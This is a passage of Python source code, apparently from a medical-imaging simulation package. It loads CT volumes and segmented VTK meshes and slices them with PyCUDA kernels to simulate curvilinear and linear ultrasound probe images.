        :param file_type: type of 3D volume to be loaded,
        currently npy, nii or dicom
        :param npy_config: json file with volume resolution parameters,
        required when file_type is npy
        :param image_num: number of images to consider for preallocation
        :param downsampling: downsampling factor on image dimensions
"""
self.planar_resolution = None
self.ct_volume = None
self.voxel_size = None
self.bound_box = None
self.xdim = None
self.ydim = None
self.zdim = None
if os.path.isfile(config_dir):
config_file = open(config_dir)
self.config = json.load(config_file)
else:
raise ValueError("No valid config file!")
# Check whether a nii or dicom is to be
# loaded
if file_type == 'dicom':
self.load_volume_from_dicom(vol_dir)
if file_type == 'nii':
self.load_volume_from_nii(vol_dir)
if file_type == 'npy':
self.load_volume_from_npy(vol_dir, npy_config)
# In order to speed up slicing, preallocate variables
# Call function to preallocate relevant variables
# to an existing list, first the GPU ones
self.g_variables = []
# Image dimensioning parameters
self.image_variables = []
# Kernel dimensioning
self.blockdim = np.array([1, 1])
# Initialise image num and downsample
self.image_num = None
self.downsampling = None
# Now run allocation to set these vars
self.preallocate_gpu_var(image_num=image_num,
downsampling=downsampling)
# Read kernel source code in C++
self.kernel_code = cres.RESLICING_KERNELS
def load_volume_from_dicom(self, dicom_dir):
"""
Loads volume from Dicom
:param dicom_dir: dicom file
"""
if not os.path.isdir(dicom_dir):
raise ValueError("No valid file directory for dicom!")
image_list = os.listdir(dicom_dir)
image_list.sort()
# Get the parameters of the volume by checking the first image
first_image = dicom.dcmread(dicom_dir + image_list[0])
# Get planar resolution
self.planar_resolution = first_image.PixelSpacing
# Get z stepping
z_step = first_image.SpacingBetweenSlices
# Define voxel size
self.voxel_size = np.hstack((self.planar_resolution,
abs(z_step)))
# Get x y z dimensions
self.xdim = first_image.pixel_array.shape[0]
self.ydim = first_image.pixel_array.shape[1]
self.zdim = len(image_list)
self.ct_volume = np.zeros([self.xdim, self.ydim, self.zdim])
# Get intensity scales
for dicom_key in first_image.keys():
if first_image[dicom_key].keyword == 'RescaleIntercept':
intensity_bias = first_image[dicom_key].value
if first_image[dicom_key].keyword == 'RescaleSlope':
intensity_slope = first_image[dicom_key].value
# Go through every image
for i in range(self.zdim):
# Get image
current_image = dicom.dcmread(dicom_dir + image_list[i]).pixel_array
# Add to volume, taking into account z direction
if z_step > 0:
self.ct_volume[:, :, i] = current_image \
* intensity_slope + intensity_bias
else:
self.ct_volume[:, :, self.zdim - i - 1] \
= current_image * intensity_slope \
+ intensity_bias
# Define bounding box
min_x = first_image.ImagePositionPatient[0]
max_x = min_x + self.planar_resolution[0] * (self.xdim - 1)
min_y = first_image.ImagePositionPatient[1]
        max_y = min_y + self.planar_resolution[1] * (self.ydim - 1)
if z_step < 0:
max_z = first_image.ImagePositionPatient[2]
min_z = max_z + z_step * (self.zdim - 1)
else:
min_z = first_image.ImagePositionPatient[2]
max_z = min_z + z_step * (self.zdim - 1)
self.bound_box = np.array([[min_x, min_y, min_z],
[max_x, max_y, max_z]])
return 0
def load_volume_from_nii(self, nii_dir):
"""
Loads volume from nii
:param nii_dir: nii file
"""
nii_file = nib.load(nii_dir)
volume = nii_file.get_fdata()
volume = np.flip(volume, axis=0)
volume = np.flip(volume, axis=1)
self.ct_volume = np.asarray(volume)
self.xdim = volume.shape[0]
self.ydim = volume.shape[1]
self.zdim = volume.shape[2]
# Get resolution parameters
affine = nii_file.affine
self.planar_resolution = abs(np.array([affine[0, 0],
affine[1, 1]]))
self.voxel_size = abs(np.array([affine[0, 0],
affine[1, 1],
affine[2, 2]]))
# Get bounding box, checking orientations
if affine[2, 2] > 0:
max_z = affine[2, 3] + affine[2, 2] * (self.zdim-1)
min_z = affine[2, 3]
else:
min_z = affine[2, 3] + affine[2, 2] * (self.zdim-1)
max_z = affine[2, 3]
if affine[1, 1] > 0:
max_y = affine[1, 3] + affine[1, 1] * (self.ydim-1)
min_y = affine[1, 3]
else:
min_y = affine[1, 3] + affine[1, 1] * (self.ydim-1)
max_y = affine[1, 3]
if affine[0, 0] > 0:
max_x = affine[0, 3] + affine[0, 0] * (self.xdim-1)
min_x = affine[0, 3]
else:
min_x = affine[0, 3] + affine[0, 0] * (self.xdim-1)
max_x = affine[0, 3]
self.bound_box = np.array([[min_x, min_y, min_z],
[max_x, max_y, max_z]])
def load_volume_from_npy(self, npy_dir, npy_config):
"""
Loads volume from npy file
        :param npy_dir: npy file
:param npy_config: volume resolution for the npy volume
"""
# Add volume data
self.ct_volume = np.load(npy_dir)
# Add resolution parameters, first get config
if os.path.isfile(npy_config):
npy_config_file = open(npy_config)
npy_config = json.load(npy_config_file)
else:
raise ValueError("No valid config for npy file!")
# Now load the parameters
self.planar_resolution = np.array(npy_config["planar resolution"])
self.voxel_size = np.array(npy_config["voxel size"])
self.bound_box = np.array(npy_config["bounding box"])
return 0
def scroll_volume(self):
"""
Shows volume stored in intensity volume object
"""
for z_ind in range(self.zdim):
plt.cla()
plt.imshow(self.ct_volume[:, :, z_ind], cmap='gray')
plt.pause(0.01)
def preallocate_gpu_var(self,
image_num,
downsampling):
"""
Function to generate local gpu variables that will
be used for simulation. Variable sizes depend on the
config parameters. g_ prefix indicates gpu variables
:param image_num: maximum number of images to be simulated
:param downsampling: downsampling value on image dimensions
per call
"""
# First check if current image variables are empty or not,
# (if they have been set before). If they are not, reset
if self.g_variables:
self.g_variables = []
if self.image_variables:
self.image_variables = []
# Check if downsampling is at least 1
if downsampling < 1:
raise ValueError("Downsampling must be greater than 1")
# Check if maximum number of images is valid
if not isinstance(image_num, int) or image_num <= 0:
raise ValueError('image_num must be positive integer')
self.image_num = image_num
self.downsampling = downsampling
# Now, choose between curvilinear and linear array
transducer_type = self.config["simulation"]["transducer"]
if transducer_type == "curvilinear":
# For the curvilinear case, get
# geometrical parameters of fan shape as a float:
# 0-Angular ray resolution, 1-ray depth resolution, 2-angle aperture
# 3-ray depth, 4-ray offset to origin, 5-ray offset to image top
fan_parameters = np.array(self.config["simulation"]["fan_geometry"])
fan_parameters[0] = np.deg2rad(fan_parameters[0])
fan_parameters[2] = np.deg2rad(fan_parameters[2])
fan_parameters[3:6] = fan_parameters[3:6] * fan_parameters[1]
fan_parameters = fan_parameters.astype(np.float32)
# Append them to image variables (becomes index 0)
self.image_variables.append(fan_parameters)
# Get point cloud dimensions from fan parameters, necessary to
# know how many points will be sampled and used for intersection
coord_w = len(np.arange((-fan_parameters[2] / 2).astype(np.float32),
(fan_parameters[2] / 2).astype(np.float32),
fan_parameters[0]))
coord_h = len(np.arange(fan_parameters[4],
fan_parameters[4] + fan_parameters[3],
fan_parameters[1]))
# Append to image variables (becomes index 1)
slice_dim = np.array([coord_w, coord_h, image_num]).astype(np.int32)
self.image_variables.append(slice_dim)
# Through downsampling, obtain the output image dimensions
# and append (becomes index 2)
image_dim_2d = np.array(self.config["simulation"]
["image_dimensions"])
image_dim = np.append(image_dim_2d / downsampling, image_num) \
.astype(np.int32)
self.image_variables.append(image_dim)
# Do the same for the image pixel size (becomes index 3)
pixel_size = np.array(self.config["simulation"]["pixel_size"])
pixel_size = (downsampling * pixel_size).astype(np.float32)
self.image_variables.append(pixel_size)
# Knowing these dimensions, now append preallocate all
# GPU variables. First, 2D and 3D positions of the fans
# (become index 0 and 1, respectively)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(slice_dim) * 3),
dtype=np.float32))
# The 3D positions, with the same size (becomes index 1)
self.g_variables.\
append(gpua.GPUArray((1, np.prod(slice_dim) * 3),
dtype=np.float32))
# The fan intersection with the volume (becomes index 2)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(slice_dim)),
dtype=np.float32))
# The volume to be slice, in a 1D array. The only non-empty
# array (becomes index 3)
volume = self.ct_volume.copy()
volume = volume.reshape([1, np.prod(volume.shape)], order="F")
self.g_variables.append(gpua.to_gpu(volume.astype(np.float32)))
# Now, the outputs, with image_dim as dimension, both images
# and fan shape outline used for interpolation (become
# index 4 and 5, respectively)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim)),
dtype=np.float32))
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim)),
dtype=np.int32))
# Determine optimal blocksize for kernels
blockdim_x, blockdim_y = cres.get_block_size(coord_w, coord_h)
self.blockdim = np.array([blockdim_x, blockdim_y])
elif transducer_type == "linear":
# For the linear case, variable definition is simpler
# Get rectangular plane dimensions first, and append
# to image variables (becomes index 0)
image_dim_2d = np.array(self.config["simulation"]
["image_dimensions"])
image_dim = np.append(image_dim_2d / downsampling, image_num) \
.astype(np.int32)
self.image_variables.append(image_dim)
# Do the same for the image pixel size (becomes index 1)
pixel_size = np.array(self.config["simulation"]["pixel_size"])
pixel_size = (downsampling * pixel_size).astype(np.float32)
self.image_variables.append(pixel_size)
# Now preallocate gpu variables, first the positions
# (becomes index 0)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim) * 3),
dtype=np.float32))
# Secondly, volume intersections that do not
# need to be warped in this case (becomes index 1)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim)),
dtype=np.float32))
# The volume to be intersected (becomes
# index 2)
volume = self.ct_volume.copy()
volume = volume.reshape([1, np.prod(volume.shape)], order="F")
self.g_variables.append(gpua.to_gpu(volume.astype(np.float32)))
# Determine optimal blocksize for kernels
blockdim_x, blockdim_y = cres.get_block_size(image_dim[0],
image_dim[1])
self.blockdim = np.array([blockdim_x, blockdim_y])
else:
# In case the transducer is another option
raise ValueError("No valid transducer type!")
def simulate_image(self,
poses=np.eye(4),
image_num=1,
out_points=False):
"""
Function that generates a set of 2D CT images from
intensity volume. Uses the function
intensity_slice_volume or linear_intensity_slice_volume
:param poses: array with probe poses
:param image_num: number of images to slice
:param out_points: bool to get sampling positions or not
:return: positions in 3D, stack of resulting images
"""
# Check if number of images matches number of poses
if poses.shape[1]/4 != image_num:
raise ValueError("Input poses do not match image number!")
# In order to not fix the number of images to be used, check
# if image num is the same as the one considered by the object
# If they differ, preallocate again
current_image_num = self.image_num
if image_num != current_image_num:
self.preallocate_gpu_var(image_num=image_num,
downsampling=self.downsampling)
print("Number of images was changed from " +
str(current_image_num) + " to " + str(image_num))
# Simulate images
volume_dim = self.ct_volume.shape
if self.config["simulation"]["transducer"] == "curvilinear":
points, images = intensity_slice_volume(
self.kernel_code,
self.image_variables,
self.g_variables,
self.blockdim,
self.bound_box,
volume_dim,
self.voxel_size,
poses=poses,
out_points=out_points)
else:
points, images = linear_intensity_slice_volume(
self.kernel_code,
self.image_variables,
self.g_variables,
self.blockdim,
self.bound_box,
volume_dim,
self.voxel_size,
poses=poses,
out_points=out_points)
return points, images
def intensity_slice_volume(kernel_code,
image_variables,
g_variables,
blockdim,
bound_box,
vol_dim,
voxel_size,
poses,
out_points=False):
"""
Function that slices an intensity volume with fan shaped sections
section defined by poses of a curvilinear array
:param kernel_code: CUDA C++ kernel code to compile
:param image_variables: image dimensioning variable list
:param g_variables: All preallocated GPU variables
as described in the preallocation function. A list with
the following indexes:
0 - fan positions in 2D
1 - fan positions in 3D
2 - intensities mapped in fan positions
3 - the target intensity volume
4 - the output images in image space
5 - the 2D fan mask outline
:param blockdim: block dimensions for CUDA kernels
:param bound_box: bounding box of target volume
:param vol_dim: 3D intensity volume dimensions
:param voxel_size: voxel_size of the volume
:param poses: input set of poses
:param out_points: bool to get fan positions or not
:return: positions in 3D, stack of resulting images
"""
# First, compile kernel code with SourceModule
cuda_modules = SourceModule(kernel_code)
# Get image variables from input
fan_parameters = image_variables[0]
slice_dim = image_variables[1]
image_dim = image_variables[2]
pixel_size = image_variables[3]
# Define voxel size for intersection of intensity volume
voxel_size = voxel_size.astype(np.float32)
# Get size of one image, useful to get array of images
im_size = image_dim[0] * image_dim[1]
# Get block and grid dimensions as int
blockdim_x = int(blockdim[0])
blockdim_y = int(blockdim[1])
griddim_x = int(slice_dim[0] / blockdim_x)
griddim_y = int(slice_dim[1] / blockdim_y)
image_num = int(slice_dim[2])
# Convert poses to 1D array to be input in a kernel
pose_array = np.zeros((1, 9 * image_num)).astype(np.float32)
# And an array to offset fan position per image plane
offset_array = np.zeros((1, 3 * image_num)).astype(np.float32)
for p_ind in range(image_num):
pose = poses[:, 4 * p_ind:4 * (p_ind + 1)]
# Allocate the pose
pose_array[0, 9 * p_ind:9 * (p_ind + 1)] = \
np.hstack((pose[0, 0:2], pose[0, 3],
pose[1, 0:2], pose[1, 3],
pose[2, 0:2], pose[2, 3]))
# Allocate the offset
offset_array[0, 3 * p_ind:3 * (p_ind + 1)] = pose[0:3, 1]
# 1-Run position computation kernel, acts on index 0 and 1 of
# the gpu variables, get kernel
transform_kernel = cuda_modules.get_function("transform")
# Then run it
transform_kernel(g_variables[1],
g_variables[0],
drv.In(pose_array),
drv.In(offset_array),
drv.In(fan_parameters),
np.int32(image_num),
block=(blockdim_x, blockdim_y, 3),
grid=(griddim_x, griddim_y, image_num))
# Collect the output to a CPU array
positions_3d = np.empty((1, np.prod(slice_dim) * 3), dtype=np.float32)
# In case points are to be used or visualised (with out_points as True)
if out_points is True:
g_variables[1].get(positions_3d)
positions_3d = positions_3d.reshape([3, np.prod(slice_dim)]).T
# 2-Next step, run slicing kernel, where intensity values are
# placed in the positions. Define volume dimensions
intensity_volume_dims = np.hstack((bound_box[0, :],
vol_dim[0],
vol_dim[1],
vol_dim[2])).astype(np.float32)
# Call kernel from file
slice_kernel = cuda_modules.get_function('weighted_slice')
slice_kernel(g_variables[2],
g_variables[1],
g_variables[3],
drv.In(intensity_volume_dims),
drv.In(voxel_size),
drv.In(slice_dim),
block=(blockdim_x, blockdim_y, 1),
grid=(griddim_x, griddim_y, image_num))
# 3-Map pixels to fan like image
# Define bounds of image output in 2d coordinates as float
image_bounding_box = np.array([-image_dim[0] * pixel_size[0]/2*1000,
0, image_dim[0],
image_dim[1]]).astype(np.float32)
# Allocate output images, the intensity image as a float, and the
# fan outline as an int. These must be in CPU.
intensity_images = np.empty((1, np.prod(image_dim)), dtype=np.float32)
masks = np.empty((1, np.prod(image_dim)), dtype=np.int32)
# Call kernel from file
map_kernel = cuda_modules.get_function('intensity_map_back')
# Then run it, multiplying coordinates value by a 1000, in order
# to avoid sampling errors
map_kernel(g_variables[4],
g_variables[5],
g_variables[2],
g_variables[0]*1000,
drv.In(slice_dim),
drv.In(image_bounding_box),
drv.In(pixel_size*1000),
block=(blockdim_x, blockdim_y, 1),
grid=(griddim_x, griddim_y, image_num))
# Create a volume with generated images
intensity_image_array = np.zeros((image_dim[1],
image_dim[0],
image_dim[2])).astype(np.float32)
# Gather the results
g_variables[4].get(intensity_images)
g_variables[4].fill(0)
g_variables[5].get(masks)
g_variables[5].fill(0)
for plane in range(image_num):
# Get image and reshape it
current_image = intensity_images[0, im_size*plane:
im_size*(plane+1)]
# Get masks that weight values
current_mask = masks[0, im_size*plane:
im_size*(plane + 1)]
# Normalise by amount of points added to image output, using the
# the occurrences output by mask, ignoring divide error
with np.errstate(divide='ignore'):
current_image = np.divide(current_image, current_mask)
current_image = current_image.reshape(image_dim[0], image_dim[1]).T
# Scale intensities, by setting nan values to minimum
nan_indexes = np.where(np.isnan(current_image))
current_image[nan_indexes] = np.nanmin(current_image)
# Allocate to output
intensity_image_array[:, :, plane] = current_image
# Output a stack of images, where each z-slice has a plane,
# and the corresponding 3D positions
return positions_3d, intensity_image_array
def linear_intensity_slice_volume(kernel_code,
image_variables,
g_variables,
blockdim,
bound_box,
vol_dim,
voxel_size,
poses,
out_points=False):
"""
Function that slices an intensity volume with rectangular sections
defined by poses of a linear array
:param kernel_code: CUDA C++ kernel code to compile
:param image_variables: image dimensioning variable list
:param g_variables: All preallocated GPU variables
as described in the preallocation function. A list with
the following indexes:
0 - rectangle positions in 3D
1 - rectangular intensity images
2 - the target intensity volume
:param blockdim: block dimensions for CUDA kernels
:param bound_box: bounding box of target volume
:param vol_dim: 3D intensity volume dimensions
:param voxel_size: voxel_size of the volume
:param poses: input set of poses
:param out_points: bool to get rectangular positions or not
:return: positions in 3D, stack of resulting images
"""
# First, compile kernel code with SourceModule
cuda_modules = SourceModule(kernel_code)
# Get image variables from input
image_dim = image_variables[0]
pixel_size = image_variables[1]
# Define voxel size for intersection of intensity volume
voxel_size = voxel_size.astype(np.float32)
# Get size of one image, useful to get array of images
im_size = image_dim[0] * image_dim[1]
# Get block and grid dimensions as int
blockdim_x = int(blockdim[0])
blockdim_y = int(blockdim[1])
griddim_x = int(image_dim[0] / blockdim_x)
griddim_y = int(image_dim[1] / blockdim_y)
image_num = int(image_dim[2])
# Convert poses to 1D array to be input in a kernel
pose_array = np.zeros((1, 9 * image_num)).astype(np.float32)
for p_ind in range(image_num):
pose = poses[:, 4*p_ind:4*(p_ind+1)]
# Allocate the pose
pose_array[0, 9*p_ind:9*(p_ind+1)] = \
np.hstack((pose[0, 0:2], pose[0, 3],
pose[1, 0:2], pose[1, 3],
pose[2, 0:2], pose[2, 3]))
# 1-Run position computation kernel, acts on index 0
# the gpu variables, get kernel
transform_kernel = cuda_modules.get_function("linear_transform")
# Then run it
transform_kernel(g_variables[0],
drv.In(pose_array),
drv.In(pixel_size),
drv.In(image_dim),
block=(blockdim_x, blockdim_y, 3),
grid=(griddim_x, griddim_y, image_num))
# Collect the output to a CPU array
positions_3d = np.empty((1, np.prod(image_dim) * 3), dtype=np.float32)
# In case points are to be used or visualised (with out_points as True)
if out_points is True:
g_variables[0].get(positions_3d)
positions_3d = positions_3d.reshape([3, np.prod(image_dim)]).T
# 2-Next step, run slicing kernel, where intensity values are
# placed in the positions. Define volume dimensions
intensity_volume_dims = np.hstack((bound_box[0, :],
vol_dim[0],
vol_dim[1],
vol_dim[2])).astype(np.float32)
# Allocate space for output images, in CPU
intensity_images = np.empty((1, np.prod(image_dim)), dtype=np.float32)
# Call kernel from file
slice_kernel = cuda_modules.get_function('weighted_slice')
slice_kernel(g_variables[1],
g_variables[0],
g_variables[2],
drv.In(intensity_volume_dims),
drv.In(voxel_size),
drv.In(image_dim),
block=(blockdim_x, blockdim_y, 1),
grid=(griddim_x, griddim_y, image_num))
# Create a volume with generated images
intensity_image_array = np.zeros((image_dim[1],
image_dim[0],
image_dim[2])).astype(np.float32)
# Gather the results
g_variables[1].get(intensity_images)
for plane in range(image_num):
# Get each image and reshape it
current_image = intensity_images[0, im_size*plane:
im_size*(plane+1)]
current_image = current_image.reshape(image_dim[1], image_dim[0])
# Allocate to output
intensity_image_array[:, :, plane] = current_image
# Output a stack of images, where each z-slice has a plane,
# and the corresponding 3D positions
return positions_3d, intensity_image_array
```
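A minimal usage sketch for `IntensityVolume`, assuming a CUDA-capable GPU with PyCUDA installed; the config and volume file names below are placeholders, not files shipped with the repository:
```python
# Hypothetical usage of IntensityVolume; paths are assumptions.
import numpy as np
from fanslicer.pycuda_simulation.intensity_volume import IntensityVolume
volume = IntensityVolume(config_dir="config/us_config.json",      # assumed path
                         vol_dir="data/ct_volume.npy",            # assumed path
                         npy_config="data/ct_volume_config.json", # assumed path
                         file_type="npy",
                         image_num=2,
                         downsampling=2)
# Two probe poses as 4x4 matrices stacked horizontally into a 4x8 array
poses = np.hstack((np.eye(4), np.eye(4)))
points, images = volume.simulate_image(poses=poses, image_num=2,
                                        out_points=True)
print(images.shape)  # (image height, image width, 2)
```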
#### File: fanslicer/pycuda_simulation/segmented_volume.py
```python
import json
import os
import numpy as np
import matplotlib.pyplot as plt
import pycuda.driver as drv
import pycuda.gpuarray as gpua
from pycuda.compiler import SourceModule
from scipy.ndimage.morphology import binary_fill_holes as fill
from scipy.ndimage.morphology import binary_erosion as erode
from scipy.ndimage.morphology import binary_dilation as dilate
import fanslicer.pycuda_simulation.mesh as mesh
import fanslicer.pycuda_simulation.cuda_reslicing as cres
class SegmentedVolume:
"""
Class that holds a segmented volume, with both
meshes and 3D binary volumes
"""
def __init__(self,
mesh_dir,
config_dir,
image_num=1,
downsampling=1,
voxel_size=1.0):
"""
Create segmented volume object
:param mesh_dir: directory with vtk models used in slicing
:param config_dir: json file with reslicing parameters and
model names to be used
:param voxel_size: isotropic voxel size considered to
generate the binary volumes for each vtk model
:param image_num: number of images to consider for preallocation
:param downsampling: downsampling factor on image dimensions
"""
self.binary_volumes = dict()
if voxel_size > 0:
self.voxel_size = voxel_size
else:
raise ValueError("Voxel size must be positive!")
# Load meshes if a directory is given
self.config = None
self.meshes = dict()
if os.path.isfile(config_dir):
config_file = open(config_dir)
self.config = json.load(config_file)
else:
raise ValueError("No valid config file!")
# First, load meshes to constructor
self.load_vtk_from_dir(mesh_dir)
# Then, load or generate simulation binary volumes
self.load_binary_volumes(mesh_dir)
# Now, preallocate variables to speed up reslicing
# Call function to preallocate relevant variables
# to existing lists, first the GPU ones
self.g_variables = []
# Image dimensioning parameters
self.image_variables = []
self.blockdim = np.array([1, 1])
# Initialise image num and downsample
self.image_num = None
self.downsampling = None
# Now run allocation to set these vars
self.preallocate_bin_gpu_var(image_num=image_num,
downsampling=downsampling)
# Read kernel source code in C++
self.kernel_code = cres.RESLICING_KERNELS
def load_vtk_from_dir(self,
mesh_dir):
"""
Loads vtk files into mesh3D objects, according
to self.config
:param mesh_dir: directory with vtk files
"""
if self.config is None:
raise ValueError("SegmentedVolume object has no config")
if not os.path.isdir(mesh_dir):
raise ValueError("No valid mesh directory")
# Get relevant files from the config
meshes_to_load = self.config["models"]["files"]
mesh_dict = {}
for file in meshes_to_load:
mesh_file = os.path.join(mesh_dir, file + '.vtk')
# Allocate mesh to mesh list if it exists
if os.path.isfile(mesh_file):
mesh_dict[file.replace(" ", "_")] =\
mesh.load_mesh_from_vtk(mesh_file)
else:
raise ValueError(file + '.vtk not found')
self.meshes = mesh_dict
return 0
def load_binary_volumes(self,
data_dir):
"""
Load or generate binary models from relevant meshes
If binary volumes do not exist in data dir, a binary volume
is generated for every relevant mesh defined in config
:param data_dir: directory from where binary volumes
is loaded/saved
"""
if not os.path.isdir(data_dir):
raise ValueError("No valid data directory")
# Prepare dictionary that contains models
volume_dict = dict()
for model in range(len(self.config['simulation']
['simulation_models'])):
# Check if model is intended for simulation
if self.config['simulation']['simulation_models'][model]:
model_name = self.config['models']['files'][model]
model_name = model_name.replace(" ", "_")
# Get a bounding box and define volume margin
margin = np.array([20, 20, 20])
bound_box = self.meshes[model_name].get_bounding_box()
bound_box[0, :] = np.floor(bound_box[0, :]) - margin
bound_box[1, :] = np.floor(bound_box[1, :]) + margin
# Check if a binary map already exists
binary_name = 'binary_' + model_name + '.npy'
if os.path.isfile(data_dir + binary_name):
# Load a pre-saved model
volume = np.load(data_dir + binary_name)
print('Loaded ' + binary_name)
else:
# Generate a model
volume = voxelise_mesh(self.meshes[model_name],
self.voxel_size,
margin,
save_dir=data_dir,
file_name=binary_name)
# Allocate to dictionary with bounding box
volume_dict[model_name] = [volume, bound_box]
# Allocate final results
self.binary_volumes = volume_dict
return 0
def preallocate_bin_gpu_var(self,
image_num,
downsampling):
"""
Function to generate local gpu variables that will
be used for simulation from binary volumes. Variable
sizes depend on the config parameters.
g_ prefix indicates gpu variables
:param image_num: maximum number of images to be simulated
:param downsampling: downsampling value on image dimensions
per call
"""
# First check if current image variables are empty or not,
# (if they have been set before). If they are not, reset
if self.g_variables:
self.g_variables = []
if self.image_variables:
self.image_variables = []
# Check if downsampling is at least 1
if downsampling < 1:
raise ValueError("Downsampling must be greater than 1")
# Check if maximum number of images is valid
if not isinstance(image_num, int) or image_num <= 0:
raise ValueError('image_num must be positive integer')
# Now, choose between curvilinear and linear array
transducer_type = self.config["simulation"]["transducer"]
if transducer_type == "curvilinear":
# For the curvilinear case, get
# geometrical parameters of fan shape as a float:
# 0-Angular ray resolution, 1-ray depth resolution, 2-angle aperture
# 3-ray depth, 4-ray offset to origin, 5-ray offset to image top
fan_parameters = np.array(self.config["simulation"]["fan_geometry"])
fan_parameters[0] = np.deg2rad(fan_parameters[0])
fan_parameters[2] = np.deg2rad(fan_parameters[2])
fan_parameters[3:6] = fan_parameters[3:6] * fan_parameters[1]
fan_parameters = fan_parameters.astype(np.float32)
# Append them to image variables (becomes index 0)
self.image_variables.append(fan_parameters)
# Get point cloud dimensions from fan parameters, necessary to
# know how many points will be sampled and used for intersection
coord_w = len(np.arange((-fan_parameters[2] / 2).astype(np.float32),
(fan_parameters[2] / 2).astype(np.float32),
fan_parameters[0]))
coord_h = len(np.arange(fan_parameters[4],
fan_parameters[4] + fan_parameters[3],
fan_parameters[1]))
# Append to image variables (becomes index 1)
slice_dim = np.array([coord_w, coord_h, image_num]).astype(np.int32)
self.image_variables.append(slice_dim)
# Through downsampling, obtain the output image dimensions
# and append (becomes index 2)
image_dim_2d = np.array(self.config["simulation"]
["image_dimensions"])
image_dim = np.append(image_dim_2d / downsampling, image_num) \
.astype(np.int32)
self.image_variables.append(image_dim)
# Do the same for the image pixel size (becomes index 3)
pixel_size = np.array(self.config["simulation"]["pixel_size"])
pixel_size = (downsampling * pixel_size).astype(np.float32)
self.image_variables.append(pixel_size)
# Knowing these dimensions, now append preallocate all
# GPU variables. First, 2D and 3D positions of the fans
# (become index 0 and 1, respectively)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(slice_dim) * 3),
dtype=np.float32))
# The 3D positions, with the same size (becomes index 1)
self.g_variables.\
append(gpua.GPUArray((1, np.prod(slice_dim) * 3),
dtype=np.float32))
# The fan intersection with the volume (becomes index 2)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(slice_dim)),
dtype=np.int32))
# Now, the outputs, with image_dim as dimension, both images
# and fan shape outline used for interpolation (become
# index 3 and 4, respectively)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim)),
dtype=np.int32))
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim)),
dtype=bool))
# Finally, determine optimal blocksize for kernels
blockdim_x, blockdim_y = cres.get_block_size(coord_w, coord_h)
self.blockdim = np.array([blockdim_x, blockdim_y])
elif transducer_type == "linear":
# For the linear case, variable definition is simpler
# Get rectangular plane dimensions first, and append
# to image variables (becomes index 0)
image_dim_2d = np.array(self.config["simulation"]
["image_dimensions"])
image_dim = np.append(image_dim_2d / downsampling, image_num) \
.astype(np.int32)
self.image_variables.append(image_dim)
# Do the same for the image pixel size (becomes index 1)
pixel_size = np.array(self.config["simulation"]["pixel_size"])
pixel_size = (downsampling * pixel_size).astype(np.float32)
self.image_variables.append(pixel_size)
# Now preallocate gpu variables, first the positions
# (becomes index 0)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim) * 3),
dtype=np.float32))
# Secondly, volume intersections that do not
# need to be warped in this case (becomes index 1)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim)),
dtype=np.int32))
# Finally, determine optimal blocksize for kernels
blockdim_x, blockdim_y = cres.get_block_size(image_dim[0],
image_dim[1])
self.blockdim = np.array([blockdim_x, blockdim_y])
else:
# In case the transducer is another option
raise ValueError("No valid transducer type!")
# To avoid repeating allocation code, allocate volumes now
# The volumes to be sliced, in a 1D array. These are added
# at the end, as their indexes start from 5 in curvilinear case,
# and 2 linear case
for model in range(len(self.config["simulation"]["simulation_models"])):
# Check if model index m is to be considered
if self.config["simulation"]["simulation_models"][model]:
# Define its dictionary key
model_name = self.config["models"]["files"][model]
model_name = model_name.replace(" ", "_")
# Reshape it, and append it as a variable
volume = self.binary_volumes[model_name][0].copy()
volume_dim = volume.shape
volume = np.swapaxes(volume, 0, 1)
volume = volume.reshape([1, np.prod(volume.shape)], order="F")
self.g_variables.append(gpua.to_gpu(volume.astype(bool)))
# Also, append their bound box, shape and display color
# to image variables becomes a variable index starting
# from 4 in curvilinear, and 2 in linear (a tuple of 3 arrays)
model_color = self.config["simulation"]["colors"][model]
self.image_variables.append([self.binary_volumes[model_name][1],
volume_dim, model_color])
self.image_num = image_num
self.downsampling = downsampling
def simulate_image(self,
poses=np.eye(4),
image_num=1,
out_points=False):
"""
Function that generates a set of images from multiple
segmented models stored in self.config. Uses the function
slice_volume or linear_slice_volume
:param poses: array with probe poses
:param image_num: number of images to simulate
:param out_points: bool to get sampling positions or not
:return: positions in 3D, stack of resulting images with
multiple labels, and stack with colored images for
visualisation
"""
# Check if number of images matches number of poses
if poses.shape[1] / 4 != image_num:
raise ValueError("Input poses do not match image number!")
# In order to not fix the number of images to be used, check
# if image num is the same as the one considered by the object
# If they differ, preallocate again
current_image_num = self.image_num
if image_num != current_image_num:
self.preallocate_bin_gpu_var(image_num=image_num,
downsampling=self.downsampling)
print("Number of images was changed from " +
str(current_image_num) + " to " + str(image_num))
# Get config parameters for the simulation
transducer_type = self.config["simulation"]["transducer"]
if transducer_type == "curvilinear":
image_dim = self.image_variables[2]
aux_index = 4
else:
# Linear case
image_dim = self.image_variables[0]
aux_index = 2
voxel_size = np.array([self.voxel_size,
self.voxel_size,
self.voxel_size])
# Prepare outputs
visual_images = np.zeros((image_dim[1], image_dim[0], 3, image_num))
simulation_images = np.zeros((image_dim[1], image_dim[0], image_num))
# Go through the models that should be intersected
for model in range(len(self.binary_volumes)):
# Go through each stored model
if transducer_type == "curvilinear":
points, images, mask = slice_volume(
self.kernel_code,
self.image_variables,
self.g_variables,
self.blockdim,
model,
voxel_size,
poses,
out_points)
else:
points, images = linear_slice_volume(
self.kernel_code,
self.image_variables,
self.g_variables,
self.blockdim,
model,
voxel_size,
poses,
out_points)
# Add images to output
simulation_images = simulation_images\
+ images.astype(int)*(model + 1)
# Create colored images, just for visualisation
model_color = self.image_variables[aux_index + model][2]
visual_images[:, :, 0, :] = visual_images[:, :, 0, :] + \
images * model_color[0] / 255
visual_images[:, :, 1, :] = visual_images[:, :, 1, :] + \
images * model_color[1] / 255
visual_images[:, :, 2, :] = visual_images[:, :, 2, :] + \
images * model_color[2] / 255
# Add grey outline, in case the array is curvilinear
if transducer_type == "curvilinear":
